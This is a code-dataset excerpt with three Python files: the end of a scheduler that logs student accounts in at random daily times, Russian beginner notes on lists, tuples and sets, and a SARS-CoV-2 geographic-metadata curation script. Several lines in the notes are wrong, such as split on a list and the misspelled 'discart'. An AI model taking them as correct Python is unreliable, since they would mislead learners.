task_time\n\n\n# 取消前一日的定时任务\ndef cancel_job():\n for job in job_list:\n schedule.cancel_job(job)\n job_list.clear()\n\ndef getCurrentDay():\n return time.strftime(\"%Y-%m-%d\", time.localtime())\n\n\n# 初始化任务\ndef init_job():\n cancel_job()\n task_dict.clear()\n # user_list = json.load(open(\"./user-config.json\"))\n user_list = json.loads(requests.get(api_url + \"/student/list\").text)\n # 任务字典 key未执行任务的时间点,value未登录用户信息{user_name: String, password: String}\n for user in user_list:\n task_time = round_time()\n # 去重\n while task_time in task_dict.keys():\n task_time = round_time()\n print(getCurrentDay() + ' ' + task_time + \" 登录用户\" + user[\"studentName\"])\n task_dict[task_time] = user\n job = schedule.every().day.at(task_time).do(login_encrypt, task_time)\n job_list.append(job)\n # print(task_dict, job_list)\n\n\ninit_job()\n# schedule.every().day.at(\"00:01\").do(init_job)\nwhile True:\n schedule.run_pending()\n time.sleep(1)\n\n","repo_name":"Pr0mi5e/python2smb","sub_path":"script/login-yongdao.py","file_name":"login-yongdao.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8014882632","text":"'''\nfrom pprint import pprint\nfrom requests_html import HTMLSession\n\nsession = HTMLSession()\nresp = session.get(f'http://dveriross.ru/mezhkomnatnye-dveri')\n\ntitle = str(resp.html.xpach('//title/text()'))\ndescription = resp.html.xpach('//meta[@name=\"description\"]')\ndescription = str(description).split('')\nh1 = resp.html.xpach('//h1/text()')\n\nprint('title: ' + title)\nprint('description: ' + description)\nprint('h1: ' + h1)\n'''\n\n\n######### list: ##########\n\n\nvar = ['wdwdwdwdwdwd', '1312414214214214214', [1,2,3,5,5, ['w','w',3,5,'6f','eff','et34t4rg','dgf422rf','3r'], 'wfw', 'ww'],'wd']\n\nprint(var[2][4]) #Внутри 2го списка 4й элемент\n#5\nprint(var[0][4])\n#'w'\nprint(var[3])\n#'wd'\nprint(var[1])\n#'1312414214214214214'\nprint(var[2])\n#[1, 2, 3, 5, 5, ['w', 'w', 3, 5, '6f', 'eff', 'et34t4rg', 'dgf422rf', '3r'], 'wfw', 'ww']\nprint(var[2][5])\n#['w', 'w', 3, 5, '6f', 'eff', 'et34t4rg', 'dgf422rf', '3r']\nprint(var[2][5][2])\n#3\n\n\nvar.append('qwerty') # добавляет элемент в конец списка. прелбразует существующий список\nvar.clear # очистка списка\na = var.copy() # создаст физически другую копию списка. У каждой копии свой ID\nbar = var # создаст копию списка. 
У каждой копии единый ID\ntar = bar # при изменении одного списка остальные тоже меняются\nvar.count() # считает количество вхождений (не считает во вложенных списках)\nvar.split() # разбивает строки на списки слов\nvar.split\ns = 'список доменов, список урл, список ключевых слов, список html страниц'\nprint(s.split())\n# ['список', 'доменов,', 'список', 'урл,', 'список', 'ключевых', 'слов,', 'список', 'html', 'страниц']\nprint(s.split().count('урл,'))\n# 1\ns.replace(',', '').upper() # замена\n'СПИСОК ДОМЕНОВ СПИСОК УРЛ СПИСОК КЛЮЧЕВЫХ СЛОВ СПИСОК HTML СТРАНИЦ'\nvar.index('1312414214214214214')\n#1\nvar[2]\n# '1312414214214214214'\nlen(var) # длина любого итерируемого списка\n#4\nvar.insert(1, 555) # добавляет элемент со сдвигом остальных\n# ['wdwdwdwdwdwd', 555, '1312414214214214214', [1, 2, 3, 5, 5, ['w', 'w', 3, 5, '6f', 'eff', 'et34t4rg', 'dgf422rf', '3r'], 'wfw', 'ww'], 'wd']\nvar.append(444) # добавляет элемент в конец списка\n# ['wdwdwdwdwdwd', 555, '1312414214214214214', [1, 2, 3, 5, 5, ['w', 'w', 3, 5, '6f', 'eff', 'et34t4rg', 'dgf422rf', '3r'], 'wfw', 'ww'], 'wd', 444]\n555 in var # проверяет наличие чего-то внутри чего-то\n# true\nvar.pop # возвращает последний элемент списка, удаляя его из списка\n# 444\n# ['wdwdwdwdwdwd', 555, '1312414214214214214', [1, 2, 3, 5, 5, ['w', 'w', 3, 5, '6f', 'eff', 'et34t4rg', 'dgf422rf', '3r'], 'wfw', 'ww'], 'wd']\nremove # удалаяет элэмент из списка\nvar.reverse() # переворачивает список, не меняя ID\nvar = var[::-1] # переворачивает список меняя ID\nlist('123456') # разбивает строку на список\n# ['1', '2', '3', '4', '5', '6']\n'123234235232'.split('2') # разбивает строку на список по символу\n# ['1', '3', '34', '35', '3', '']\nr = [2, 4 ,5 ,65, 34, 345, 2, 6, 6, 7 ,9]\nr.sort() #сортирует список\n# [2, 2, 4, 5, 6, 6, 7, 9, 34, 65, 345]\n\n\n###### КОРТЕЖ (tuple) #######\n# неизмняемый тип данных\nkort = var = (123111115, 1312414214214214214, 87, 786,2576)\n# поддеррживаются все методы списков, кроме изменяющих.\n\nkort = list(kort) # для сортировки и изменения данных перегоняем кортеж в список\nkort.sort() # сортируем\n# [87, 786, 2576, 123111115, 1312414214214214214]\nkort = tuple(kort) # и обратно в кортеж\n# (87, 786, 2576, 123111115, 1312414214214214214)\n\n#список в кортеже можно изменять как угодно.\nkort1 = (87, 786, 2576, 123111115,['w', 'w', 3, 5, '6f', 'eff', 'et34t4rg', 'dgf422rf', '3r'], 1312414214214214214)\nkort1[4].append('qwerty') # добваляем элемент в конец списка в кортеже\n# (87, 786, 2576, 123111115, ['w', 'w', 3, 5, '6f', 'eff', 'et34t4rg', 'dgf422rf', '3r', 'qwerty'], 1312414214214214214)\n\n######## Распаковка кортежа #######\nkort2 = (0,1,2,3,4)\na, b, c, d, e = kort2\n# a = 0\n# b = 1\n# c = 2\n# d = 3\n# e = 4\n\nt = a, b, c, d, e # запаковка кортежа\n\n###### обмен значений 2х переменных #######\n\na = 100\nb = 200\n\na, b = b, a # создаётся кортеж и переприсваевается\n\n\nrt = 1,2,3,4,5,5685,89,345,14 # бюбой набор переменных, написанных через запятую интерпритатор воспринимает как кортеж\n# (1,2,3,4,5,5685,89,345,14)\n\n####### Множества (set) ########\n# тоже массив, но в него записываются только уникальные значения\n# слайсы ииндексы не работают\nst = {1,2,3,4,5,45}\n# .append не работает здесь\n # {1,2,3,4,5,10,45}\n\nst.add((1,2,6)) # можно добавить внутрь кортеж, но не список\n# {1, 2, 3, 4, 5, 45, (1, 2, 6)}\n\nhash(123) # конвертирует в ХЕШ. Множества работают по хешам и очень быстро\n\nbr = {1,2,3}\n\nst - br # вычитание множеств. 
Складывать нельзя (+)\n# {45, 4, 5, (1, 2, 6)}\n\nst.union(br)\n# {1, 2, 3, 4, 5, 45, (1, 2, 6)}\n\n# Методы множеств возвращают копии объекта, не меняя сам объект. Объекты остаются неизменными.\n\nst.difference(br) # То же, что и (-)\n\nst.difference_update(br) # То же, что и (-), но сохраняет изменения в объекте\n\nst.discart(br) # ???\n\nst.intersection(br) # пересечения множеств\n# {1, 2, 3}\n\n","repo_name":"PlanckConstant/for-SEO","sub_path":"First_pars.py","file_name":"First_pars.py","file_ext":"py","file_size_in_byte":6554,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71204818962","text":"import os\nfrom difflib import SequenceMatcher\nfrom pathlib import Path\nfrom geopy.geocoders import Nominatim\nfrom collections import Counter\n\n# Used for printing bold in console output\ndef bold(s):\n return('\\033[1m' + s + '\\033[0m')\n\nreplace_special_char = {\n \"é\":\"e\",\n \"è\":\"e\",\n \"ü\":\"ue\",\n \"ä\":\"ae\",\n \"ö\":\"oe\",\n \"í\":\"i\",\n \"ó\":\"o\",\n \"ç\":\"c\",\n \"á\":\"a\",\n \"'\":\" \",\n \"â\":\"a\",\n \"š\":\"s\",\n \"ť\":\"t\",\n \"ñ\":\"n\",\n \"ř\":\"r\",\n \"ž\":\"z\",\n \"ů\":\"u\",\n \"ý\":\"y\",\n \"ě\":\"e\",\n \"ň\":\"n\",\n \"ã\":\"a\",\n \"ê\":\"e\",\n \"č\":\"c\",\n \"ô\":\"o\",\n \"ı\":\"i\",\n \"ú\":\"u\",\n \"ś\":\"s\",\n \"ą\":\"q\",\n \"à\":\"a\",\n \"å\":\"a\",\n \"ł\":\"l\",\n \"-\":\" \",\n \"î\":\"i\",\n \"ŕ\":\"r\",\n \"ľ\":\"l\",\n \"ď\":\"d\",\n \"ć\": \"c\",\n \"ș\": \"s\",\n}\n\n# Compare strings without considering special characters and caps\ndef clean_string(s):\n s = s.lower()\n for c in replace_special_char:\n s = s.replace(c, replace_special_char[c])\n return s\n\n# Read in files containing simple lists, dictionaries or geoLocationRules\ndef read_local_file(file_name):\n path_file_name = path_to_config_files + file_name\n\n with open(path_file_name) as myfile:\n file_content = myfile.readlines()\n\n list_format = [accepted_additions_file]\n\n if file_name in list_format: # simple list\n return [line.strip() for line in file_content[1:]]\n\n abbreviations_format = [abbreviations_file]\n\n if file_name in abbreviations_format: # dictionary, keys seperated from content with tabs\n content = {}\n for line in file_content:\n if line == \"\\n\":\n continue\n if line.startswith(\"#\"):\n key = line.strip().split(\"# \")[1]\n content[key] = {}\n continue\n l = line.strip().split(\"\\t\")\n if l[0] in content[key]:\n print(\"Attention, duplicate found while reading \" + file_name + \": \" + l[0] + \" -> \" + l[1] + \", \" + content[key][l[0]])\n content[key][l[0]] = l[1]\n return content\n\n geoLocationRule_format = [geoLocationRules_file, manualAnnotationRules_file, internationalExceptions_file]\n\n if file_name in geoLocationRule_format: # Read as simple dictionary\n content = {}\n for line in file_content:\n if line == \"\\n\":\n continue\n l = line.strip().split(\"\\t\")\n k = l[0]\n c = l[1]\n if k in content:\n print(\"Attention, duplicate found while reading \" + file_name + \": \" + k + \" -> \" + c + \", \" + content[k])\n content[k] = c\n return content\n\n# Read ordering file into simple dictionary based on type (e.g. 
location, division, pango_lineage)\ndef read_ordering(path):\n with open(path + ordering_file) as myfile:\n file_content = myfile.readlines()\n\n ordering = {}\n for line in file_content:\n if line == \"\\n\" or line.startswith(\"#\"):\n continue\n l = line.strip().split(\"\\t\")\n type = l[0]\n name = l[1]\n if type not in ordering:\n ordering[type] = []\n ordering[type].append(name)\n\n return ordering\n\n# Read lat_longs into dictionary based on type (e.g. location, division)\ndef read_latlongs(path):\n with open(path + latlongs_file) as myfile:\n file_content = myfile.readlines()\n\n latlongs = {\"location\": {}, \"division\": {}, \"country\": {}, \"region\": {}}\n\n for line in file_content:\n if line == \"\\n\" or line.startswith(\"#\"):\n continue\n l = line.strip().split(\"\\t\")\n type = l[0] # location, division etc.\n name = l[1]\n\n if name not in latlongs[type]:\n latlongs[type][name] = (float(l[2]), float(l[3])) # Store as float to enable sorting by lat_longs\n else:\n print(\"Duplicate in lat_longs? (\" + l[0] + \" \" + l[1] + \")\\n\")\n\n return latlongs\n\n# Read metadata into a multi-level dictionary accessible via data[region][country][division] = list_of_locations\ndef read_metadata(metadata_filename, data, geo_location_occurences, genbank=False):\n\n with open(path_to_metadata + metadata_filename) as f:\n header = f.readline().split(\"\\t\")\n country_i = header.index(\"country\")\n region_i = header.index(\"region\")\n division_i = header.index(\"division\")\n location_i = header.index(\"location\")\n\n line = f.readline()\n while line:\n l = line.split(\"\\t\")\n country = l[country_i]\n region = l[region_i]\n division = l[division_i]\n location = l[location_i]\n\n # automatically increment genbank locations to the threshold since we\n # don't want to skip any for now.\n increment = 1 if not genbank else 20\n\n geo_location_occurences[\"region\"].update({region: increment})\n geo_location_occurences[\"country\"].update({country: increment})\n geo_location_occurences[\"division\"].update({division: increment})\n geo_location_occurences[\"location\"].update({location: increment})\n\n if region not in data:\n data[region] = {}\n if country not in data[region]:\n data[region][country] = {}\n if division not in data[region][country]:\n data[region][country][division] = []\n if location not in data[region][country][division]:\n data[region][country][division].append(location)\n\n line = f.readline()\n\n return data, geo_location_occurences\n\n# Read metadata again, but this time consider region_exposure, country_exposure and division_exposure (e.g. travel info)\n# In order to be properly displayed, exposure geographies need also be included in color_ordering and lat_longs\n# Only include exposure geography if already specified in accepted exposure file, otherwise print warning\ndef read_exposure(data, metadata_filename, accepted_additions_file):\n # divisions and countries that are accepted additions to the metadata\n accepted_exposure = read_local_file(accepted_additions_file)\n\n # Check given accepted exposures and print warning if already included in the data\n # (e.g. 
if the country was unknown when the exposure was registered, but had sequences added in the meantime)\n for region in data:\n for country in data[region]:\n if country + \" (\" + region + \")\" in accepted_exposure:\n print(\"Specified exposure \" + bold(country + \" (\" + region + \")\") + \" is no longer needed and can be removed from \" + accepted_additions_file + \".\")\n for division in data[region]:\n if division + \" (\" + country + \", \" + region + \")\" in accepted_exposure:\n print(\"Specified exposure \" + bold(division + \" (\" + country + \", \" + region + \")\") + \" is no longer needed and can be removed from \" + accepted_additions_file + \".\")\n\n with open(path_to_metadata + metadata_filename) as f:\n header = f.readline().split(\"\\t\")\n region_i = header.index(\"region_exposure\")\n country_i = header.index(\"country_exposure\")\n division_i = header.index(\"division_exposure\")\n epi_i = header.index(\"gisaid_epi_isl\")\n\n line = f.readline()\n while line:\n l = line.split(\"\\t\")\n region = l[region_i]\n country = l[country_i]\n division = l[division_i]\n epi = l[epi_i]\n\n if region not in data:\n print(\"Strain \" + epi + \" has unknown region_exposure \" + bold(region) + \". Please correct!\")\n else:\n s1 = country + \" (\" + region + \")\"\n country_present = True\n if country not in data[region]:\n country_present = False\n if s1 in accepted_exposure or country == region:\n data[region][country] = {}\n country_present = True\n else:\n print(\"Strain \" + epi + \" has unknown country_exposure \" + bold(country) + \". Please correct or consider adding \" + bold(s1) + \" to \" + accepted_additions_file + \"!\")\n if country_present:\n s2 = division + \" (\" + country + \", \" + region + \")\"\n if division not in data[region][country]:\n if s2 in accepted_exposure or division == country:\n data[region][country][division] = [\"\"]\n else:\n print(\"Strain \" + epi + \" has unknown division_exposure \" + bold(division) + \". Please correct or consider adding \" + bold(s2) + \" to \" + accepted_additions_file + \"!\")\n line = f.readline()\n return data\n\n# Given a set of corrections, adjust the data dictionary accordingly\ndef correct_data(data, corrections):\n for (region, country, division, location, region_correct, country_correct, division_correct, location_correct) in corrections:\n if country_correct not in data[region_correct]:\n data[region_correct][country_correct] = {}\n if division_correct not in data[region_correct][country_correct]:\n data[region_correct][country_correct][division_correct] = []\n if location_correct not in data[region_correct][country_correct][division_correct]:\n data[region_correct][country_correct][division_correct].append(location_correct)\n\n # If no entries are contained downstream, assume geography level is now obsolete and delete from the data dictionary\n # (e.g. 
if a misspelled region is corrected, delete it from data after copying over all downstream countries, divisions and locations)\n data[region][country][division].remove(location)\n if data[region][country][division] == []:\n del data[region][country][division]\n if data[region][country] == {}:\n del data[region][country]\n if data[region] == {}:\n del data[region]\n return data\n\n# Given 3 sets of (region, country, division, location), decide whether the 'given' set corresponds to the\n# 'before' set (considering the wildcard *) and formulate the correction needed to change it to the to 'correct' set\ndef formulate_correction(given, before, correct):\n (region, country, division, location) = given\n (region_before, country_before, division_before, location_before) = before\n (region_correct, country_correct, division_correct, location_correct) = correct\n if region_correct == \"*\":\n region2 = region\n else:\n region2 = region_correct\n\n if country_correct == \"*\":\n country2 = country\n else:\n country2 = country_correct\n\n if division_correct == \"*\":\n division2 = division\n else:\n division2 = division_correct\n\n if location_correct == \"*\":\n location2 = location\n else:\n location2 = location_correct\n\n if (region == region_before or region_before == \"*\") \\\n and (country == country_before or country_before == \"*\") \\\n and (division == division_before or division_before == \"*\") \\\n and (location == location_before or location_before == \"*\"):\n return (region, country, division, location, region2, country2, division2, location2)\n return None\n\n# Given a set of rules, traverse the data dictionary and find and correct cases where rules apply\n# For manualAnnotationRules: Enable different delimiter than '/' in case this is included in a location name\ndef apply_rules(data, ruleSet, delimiter = [\"/\"], print_rules = True):\n rules = read_local_file(ruleSet)\n\n applied_rules = {}\n for g in rules:\n for d in delimiter:\n rules_apply = []\n if d not in g or d not in rules[g]:\n continue\n (region_before, country_before, division_before, location_before) = g.split(d)\n (region_correct, country_correct, division_correct, location_correct) = rules[g].split(d)\n\n # Due to reoccuring bug: Since empty divisions are automatically filled with the country name later in the\n # ncov-ingest pipeline, give a warning when detecting a rule that might be affected\n if country_before == division_before:\n recommended_rule = d.join([region_before, country_before, \"\", \"\"])\n if recommended_rule not in rules:\n print(bold(\"Attention: Consider automatic division filler applied after geoLocationRules (Hint: add [\" + recommended_rule + \"\\t\" + rules[g] + \"])\"))\n\n for region in data:\n for country in data[region]:\n for division in data[region][country]:\n for location in data[region][country][division]:\n correction = formulate_correction((region, country, division, location), (region_before, country_before, division_before, location_before), (region_correct, country_correct, division_correct, location_correct))\n if correction is not None:\n rules_apply.append(correction)\n if print_rules:\n print(\"/\".join(correction[:4]) + \"\\t\" + \"/\".join(correction[4:]))\n applied_rules[correction[:4]] = correction[4:]\n\n data = correct_data(data, rules_apply)\n\n # Also return all rules that were applied to the data to make detection of conflicting annotations easier later\n return data, applied_rules\n\n# Check all locations if the appear as division elsewhere (ignore cases where 
division == location)\ndef check_division_inconsistency(data):\n for region in data:\n for country in data[region]:\n for division in data[region][country]:\n if division != \"\":\n for location in data[region][country][division]:\n if location != \"\":\n if location in data[region][country] and location != division:\n print(bold(location) + \" found as both division and location within division \" + bold(division) + \".\")\n if list(data[region][country][location]) != [\"\"]: # Locations found below both divisions - needs manual review which division is proper\n print(\"Conflict found: Both divisions contain locations:\")\n l = data[region][country][location]\n if len(l) > 10:\n s = \", \".join(l[:10]) + \"... (plus \" + str(len(l) - 10) + \" more)\"\n else:\n s = \", \".join(l)\n print(\"division \" + bold(location) + \": location(s) \" + s)\n\n l = data[region][country][division]\n if len(l) > 10:\n s = \", \".join(l[:10]) + \"... (plus \" + str(len(l) - 10) + \" more)\"\n else:\n s = \", \".join(l)\n print(\"division \" + bold(division) + \": location(s) \" + s)\n print(\"(Template for correction\" + \"[\" + \"/\".join([region, country, location, \"?\"]) + \"\\t\" + \"/\".join([region, country, division, \"?\"]) + \"])\\n\")\n\n else: # No location found below the affected location/division - change to proper level\n print(\"/\".join([region, country, location, \"\"]) + \"\\t\" + \"/\".join([region, country, division, location]) + \"\\n\")\n\n# Search for duplicates on location and division level\ndef check_duplicates(data, abbreviations_file):\n abbreviations = read_local_file(abbreviations_file)\n\n # Collect all locations and their (region, country, division) origin\n # Cut away all present duplicate specifiers (e.g. 'Guadalupe ES' -> 'Guadalupe') - data is treated as if no\n # duplicate adjustment has happened before. This way, changes in duplicates can be detected and properly treated\n # (e.g. if another duplicate appears in the same country but different division, adjust the duplicate specifier\n # from country abbreviation to division) (e.g. 'Guadalupe ES' -> 'Guadalupe (Extremadura)')\n location_origin = {}\n for region in data:\n if region not in region_order:\n continue\n for country in data[region]:\n if country == region:\n continue\n if country not in abbreviations[\"country\"]:\n print(\"Abbreviation missing for \" + country + \". Please add to \" + abbreviations_file)\n continue\n for division in data[region][country]:\n if country == \"USA\" and division not in abbreviations[\"division\"]:\n print(\"Abbreviation missing for US state \" + division + \". 
Please add to \" + abbreviations_file)\n continue\n for location in data[region][country][division]:\n if location == \"\":\n continue\n if location.endswith(\" (\" + division + \")\"): # Cut away already existing duplicate specifiers\n location = location.split(\" (\" + division + \")\")[0]\n elif location.endswith(\" \" + abbreviations[\"country\"][country]):\n location = location.split(\" \" + abbreviations[\"country\"][country])[0]\n elif country == \"USA\" and location.endswith(\" \" + abbreviations[\"division\"][division]):\n location = location.split(\" \" + abbreviations[\"division\"][division])[0]\n elif len(location.split(\" \")[-1]) > 1 and location.upper().split(\" \")[-1] == location.split(\" \")[-1] or \"(\" in location:\n # If parentheses or caps found at the end of the location, consider potential invalid duplicate specifier\n if not location.split(\" \")[-1].isnumeric():\n #print(f\"{'/'.join([region, country, division, location])}\\t{'/'.join([region, country, division, location.split(' ')[0]])}\")\n print(\"Potential duplicate inconsistent with current rules: \" + location)\n\n if location not in location_origin:\n location_origin[location] = []\n location_origin[location].append((region, country, division))\n print()\n\n # Filter for duplicates (locations that have more than one (region, country, division) origin set)\n locations_duplicates = {}\n for location in location_origin:\n if len(location_origin[location]) > 1: # more than one (region, country, division) origin\n reduced = []\n countries = []\n for combination in location_origin[location]:\n if combination not in reduced:\n countries.append(combination[1])\n reduced.append(combination)\n # If, after reducing, only one set of (region, country, division) is left, that means there was a location\n # unnecessarily specified as duplicate where the location doesn't exist in any other country/division\n # In that case print out warning that this location needs not be considered as a duplicate anymore and the\n # corresponding geoLocationRules and annotations should be corrected\n if len(reduced) == 1 and countries != [\"USA\"]:\n print(\"Unnecessary duplicate: \" + bold(location) + \"\\n\")\n else:\n # Unless country is USA, then leave these \"unneccessary\" duplicate specifications, as the automatic\n # county assignment already considers duplicates\n locations_duplicates[location] = reduced\n\n # Apply duplicates rules\n for location in locations_duplicates:\n printed_message = []\n divisions = {}\n for (region, country, division) in locations_duplicates[location]:\n if country not in divisions:\n divisions[country] = []\n divisions[country].append(division)\n\n for (region, country, division) in locations_duplicates[location]:\n if country == \"USA\": # For locations in the USA: always use state abbreviation\n location_new = location + \" \" + abbreviations[\"division\"][division]\n if location in data[region][country][division]:\n printed_message.append(\"/\".join([region, country, division, location]) + \"\\t\" + \"/\".join([region, country, division, location_new]))\n if location + \" (\" + division + \")\" in data[region][country][division]:\n #printed_message.append(\"Please update duplicate \" + bold(location + \" (\" + division + \")\") + \" to \" + bold(location_new) + \" for consistency.\")\n printed_message.append(\"/\".join([region, country, division, location + \" (\" + division + \")\"]) + \"\\t\" + \"/\".join([region, country, division, location_new]))\n\n elif len(divisions[country]) == 1: # 
Among-country duplicate - use country abbreviation\n location_new = location + \" \" + abbreviations[\"country\"][country]\n if location in data[region][country][division]:\n printed_message.append(\"/\".join([region, country, division, location]) + \"\\t\" + \"/\".join([region, country, division, location_new]))\n if location + \" (\" + division + \")\" in data[region][country][division]:\n #printed_message.append(\"Please update duplicate \" + bold(location + \" (\" + division + \")\") + \" to \" + bold(location_new) + \" for consistency.\")\n printed_message.append(\"/\".join([region, country, division, location + \" (\" + division + \")\"]) + \"\\t\" + \"/\".join([region, country, division, location_new]))\n\n else: # Within-country duplicate - use division as unique identifier\n location_new = location + \" (\" + division + \")\"\n if location in data[region][country][division]:\n printed_message.append(\"/\".join([region, country, division, location]) + \"\\t\" + \"/\".join([region, country, division, location_new]))\n if location + \" \" + abbreviations[\"country\"][country] in data[region][country][division]:\n #printed_message.append(\"Please update duplicate \" + bold(location + \" \" + abbreviations[\"country\"][country]) + \" to \" + bold(location_new) + \" for consistency.\")\n printed_message.append(\"/\".join([region, country, division, location + \" \" + abbreviations[\"country\"][country]]) + \"\\t\" + \"/\".join([region, country, division, location_new]))\n if printed_message != []:\n #print(\"Duplicate found: \" + bold(location))\n for l in printed_message:\n print(l)\n #print()\n\n ### DIVISION ###\n print(\"\\n----------\\n\")\n print(\"Checking for division duplicates...\\n\")\n\n # Collect all divisions and their (region, country) origin\n division_origin = {}\n for region in data:\n if region not in region_order:\n continue\n for country in data[region]:\n if country == region or country not in abbreviations[\"country\"]:\n continue\n for division in data[region][country]:\n if division.endswith(\" \" + abbreviations[\"country\"][country]):\n division = division.split(\" \" + abbreviations[\"country\"][country])[0]\n if division not in division_origin:\n division_origin[division] = []\n # Special cases where a duplicate specification seems out of place for one of the countries (e.g. 
US states)\n if (division == \"Montana\" or division == \"Maryland\") and country == \"USA\":\n print(\"(Ignoring duplicate division \" + division + \" in favor of the USA.)\")\n elif country == \"Luxembourg\" and division == \"Luxembourg\":\n print(\"(Ignoring duplicate division \" + division + \" in favor of the country Luxembourg.)\")\n else:\n division_origin[division].append((region, country))\n\n # Filter for duplicates\n division_duplicates = {}\n for division in division_origin:\n if len(division_origin[division]) > 1:\n reduced = []\n countries = []\n for combination in division_origin[division]:\n if combination not in reduced:\n countries.append(combination[1])\n reduced.append(combination)\n if len(reduced) == 1:\n print(\"Unnecessary duplicate: \" + bold(division) + \"\\n\")\n else:\n division_duplicates[division] = reduced\n\n print()\n # Apply duplicates rules\n for division in division_duplicates:\n printed_message = []\n\n for (region, country) in division_duplicates[division]:\n division_new = division + \" \" + abbreviations[\"country\"][country]\n if division in data[region][country]:\n printed_message.append(\"/\".join([region, country, division, \"*\"]) + \"\\t\" + \"/\".join([region, country, division_new, \"*\"]))\n\n if printed_message != []:\n print(\"Duplicate found: \" + bold(division))\n for l in printed_message:\n print(l)\n print()\n\n ### COUNTRY ###\n print(\"\\n----------\\n\")\n print(\"Checking for country duplicates...\\n\")\n\n country_origin = {}\n for region in data:\n if region not in region_order:\n continue\n for country in data[region]:\n if country not in country_origin:\n country_origin[country] = []\n country_origin[country].append(region)\n\n for country in country_origin:\n if len(country_origin[country]) > 1:\n print(\"Duplicate country found: \" + bold(country) + \" within \" + bold(\", \".join(country_origin[country])))\n if len(country_origin[country]) == 2:\n print(\"/\".join([country_origin[country][0], country, \"*\", \"*\"]) + \" <-> \" + \"/\".join([country_origin[country][1], country, \"*\", \"*\"]))\n\n return locations_duplicates\n\n# Search for all locations, divisions, countries and regions that are not present in the lat_longs.tsv file\ndef missing_coordinates(data, path, geo_location_occurences):\n missing_latlongs = {\"region\": [], \"country\": {}, \"division\": {}, \"location\": {}}\n\n latlongs = read_latlongs(path)\n\n for region in data:\n if region not in region_order:\n missing_latlongs[\"region\"].append(region)\n\n for country in data[region]:\n if country not in latlongs[\"country\"]:\n if region not in missing_latlongs[\"country\"]:\n missing_latlongs[\"country\"][region] = []\n missing_latlongs[\"country\"][region].append(country)\n\n division_threshold_function = lambda division: division not in latlongs[\"division\"] and (geo_location_occurences[\"division\"][division] >= 20)\n for division in filter(division_threshold_function, data[region][country]):\n if region not in missing_latlongs[\"division\"]:\n missing_latlongs[\"division\"][region] = {}\n if country not in missing_latlongs[\"division\"][region]:\n missing_latlongs[\"division\"][region][country] = []\n missing_latlongs[\"division\"][region][country].append(division)\n\n return missing_latlongs\n\n# Print out missing locations, divisions etc. 
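The division_threshold_function above only reports a division as missing once it has been seen at least 20 times in the metadata, so one-off typos do not trigger coordinate lookups. A minimal sketch of that filter, assuming a Counter of occurrences and a set of divisions that already have coordinates; the names and counts are made up.

from collections import Counter

geo_occurrences = Counter({"Bavaria": 57, "Bavariia": 1, "Tuscany": 24})
divisions_with_latlongs = {"Tuscany"}

def needs_coordinates(division, threshold=20):
    # report only frequent divisions that have no coordinates yet
    return division not in divisions_with_latlongs and geo_occurrences[division] >= threshold

print([d for d in geo_occurrences if needs_coordinates(d)])  # ['Bavaria']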
in a sorted manner\ndef print_missing_places(missing_latlongs):\n ### DIVISION ###\n print(\"\\n----------\\n\")\n if missing_latlongs['division']:\n print(\"Missing divisions:\")\n for region in missing_latlongs[\"division\"]:\n print(\"# \" + region + \" #\")\n for country in missing_latlongs[\"division\"][region]:\n print(country)\n for division in missing_latlongs[\"division\"][region][country]:\n print(\"\\tdivision\\t\" + bold(division))\n print()\n else:\n print(\"No missing divisions\")\n\n ### COUNTRY ###\n print(\"\\n----------\\n\")\n if missing_latlongs['country']:\n print(\"\\nMissing countries:\")\n for region in missing_latlongs[\"country\"]:\n print(\"# \" + region + \" #\")\n for country in missing_latlongs[\"country\"][region]:\n print(\"\\tcountry\\t\" + bold(country))\n else:\n print(\"No missing countries\")\n\n ### REGION ###\n if missing_latlongs['region']:\n print(\"\\n----------\\n\")\n print(\"\\nMissing regions:\")\n for region in missing_latlongs[\"region\"]:\n print(\"\\tregion\\t\" + bold(region))\n\n\n# For all missing place names, search the data for similarly spelled names\n# Always search only within the same ordering level as the missing name, as well as below the same higher-level place\n# (e.g. for a missing location, compare only to locations within the same division)\ndef search_similar_names(data, missing_latlongs, locations_duplicates):\n\n abbreviations = read_local_file(abbreviations_file)\n\n ### DIVISION ###\n print(\"\\n----------\\n\")\n identical = []\n similar = {}\n\n for region in missing_latlongs[\"division\"]:\n for country in missing_latlongs[\"division\"][region]:\n for division in missing_latlongs[\"division\"][region][country]:\n similarity_score = 0\n identical_hit = False\n best_match = None\n\n for division2 in data[region][country]:\n if division2 == division:\n continue\n if clean_string(division) == clean_string(division2): # Identical except for alternative chars\n identical.append(\"/\".join([region, country, bold(division), \"*\"]) + \"\\t\" + \"/\".join([region, country, bold(division2), \"*\"]))\n identical_hit = True\n break\n\n diff = SequenceMatcher(None, division, division2).ratio() # Similarity score if not perfect hit\n if diff > 0.6:\n if diff > similarity_score:\n similarity_score = diff\n best_match = division2\n\n if not identical_hit and best_match is not None:\n while similarity_score in similar:\n similarity_score += 0.000000000000001\n similar[similarity_score] = \"/\".join([region, country, bold(division), \"*\"]) + \"\\t\" + \"/\".join([region, country, bold(best_match), \"*\"])\n\n if identical:\n print(\"Identical divisions:\")\n for l in identical:\n print(l)\n\n if similar:\n print(\"\\nSimilar divisions (sorted by descending similarity):\")\n for l in sorted(similar, reverse=True):\n print(similar[l])\n\n ### COUNTRY ###\n print(\"\\n----------\\n\")\n identical = []\n similar = {}\n\n for region in missing_latlongs[\"country\"]:\n for country in missing_latlongs[\"country\"][region]:\n similarity_score = 0\n identical_hit = False\n best_match = None\n\n for country2 in data[region]:\n if country2 == country:\n continue\n if clean_string(country) == clean_string(country2): # Identical except for alternative chars\n identical.append(\"/\".join([region, bold(country), \"*\", \"*\"]) + \"\\t\" + \"/\".join([region, bold(country2), \"*\", \"*\"]))\n identical_hit = True\n break\n\n diff = SequenceMatcher(None, country, country2).ratio() # Similarity score if not perfect hit\n if diff > 0.6:\n if diff > 
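The similarity search above combines an exact comparison of cleaned strings with difflib's SequenceMatcher ratio (cut-off 0.6) to propose likely misspellings. A minimal sketch of that comparison; lower-casing stands in for the script's clean_string() normalisation here.

from difflib import SequenceMatcher

def best_fuzzy_match(name, candidates):
    best, best_score = None, 0.6          # same cut-off as used above
    for cand in candidates:
        if cand == name:
            continue
        if cand.lower() == name.lower():  # identical except for case/alternative chars
            return cand, 1.0
        score = SequenceMatcher(None, name, cand).ratio()
        if score > best_score:
            best, best_score = cand, score
    return best, best_score

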